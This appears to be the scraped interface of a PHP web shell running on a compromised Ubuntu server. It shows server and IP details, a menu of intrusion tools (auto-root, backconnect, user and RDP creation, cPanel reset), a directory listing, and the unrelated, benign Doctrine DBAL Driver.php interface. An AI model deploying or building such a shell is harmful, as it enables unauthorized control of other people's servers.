Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.158
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
vendor /
doctrine /
dbal /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
ArrayParameters
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Connections
[ DIR ]
drwxr-xr-x
Driver
[ DIR ]
drwxr-xr-x
Event
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Id
[ DIR ]
drwxr-xr-x
Logging
[ DIR ]
drwxr-xr-x
Platforms
[ DIR ]
drwxr-xr-x
Portability
[ DIR ]
drwxr-xr-x
Query
[ DIR ]
drwxr-xr-x
SQL
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Tools
[ DIR ]
drwxr-xr-x
Types
[ DIR ]
drwxr-xr-x
ArrayParameterType.php
982
B
-rw-r--r--
ColumnCase.php
429
B
-rw-r--r--
Configuration.php
6.52
KB
-rw-r--r--
Connection.php
62.62
KB
-rw-r--r--
ConnectionException.php
917
B
-rw-r--r--
Driver.php
1.62
KB
-rw-r--r--
DriverManager.php
8.95
KB
-rw-r--r--
Events.php
1.58
KB
-rw-r--r--
Exception.php
4.95
KB
-rw-r--r--
ExpandArrayParameters.php
3.69
KB
-rw-r--r--
FetchMode.php
333
B
-rw-r--r--
LockMode.php
419
B
-rw-r--r--
ParameterType.php
982
B
-rw-r--r--
Query.php
1.16
KB
-rw-r--r--
Result.php
7.85
KB
-rw-r--r--
Statement.php
7.46
KB
-rw-r--r--
TransactionIsolationLevel.php
601
B
-rw-r--r--
VersionAwarePlatformDriver.php
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Driver.php
<?php namespace Doctrine\DBAL; use Doctrine\DBAL\Driver\API\ExceptionConverter; use Doctrine\DBAL\Driver\Connection as DriverConnection; use Doctrine\DBAL\Driver\Exception; use Doctrine\DBAL\Platforms\AbstractPlatform; use Doctrine\DBAL\Schema\AbstractSchemaManager; use SensitiveParameter; /** * Driver interface. * Interface that all DBAL drivers must implement. * * @psalm-import-type Params from DriverManager */ interface Driver { /** * Attempts to create a connection with the database. * * @param array<string, mixed> $params All connection parameters. * @psalm-param Params $params All connection parameters. * * @return DriverConnection The database connection. * * @throws Exception */ public function connect( #[SensitiveParameter] array $params ); /** * Gets the DatabasePlatform instance that provides all the metadata about * the platform this driver connects to. * * @return AbstractPlatform The database platform. */ public function getDatabasePlatform(); /** * Gets the SchemaManager that can be used to inspect and change the underlying * database schema of the platform this driver connects to. * * @deprecated Use {@link AbstractPlatform::createSchemaManager()} instead. * * @return AbstractSchemaManager */ public function getSchemaManager(Connection $conn, AbstractPlatform $platform); /** * Gets the ExceptionConverter that can be used to convert driver-level exceptions into DBAL exceptions. */ public function getExceptionConverter(): ExceptionConverter; }
Close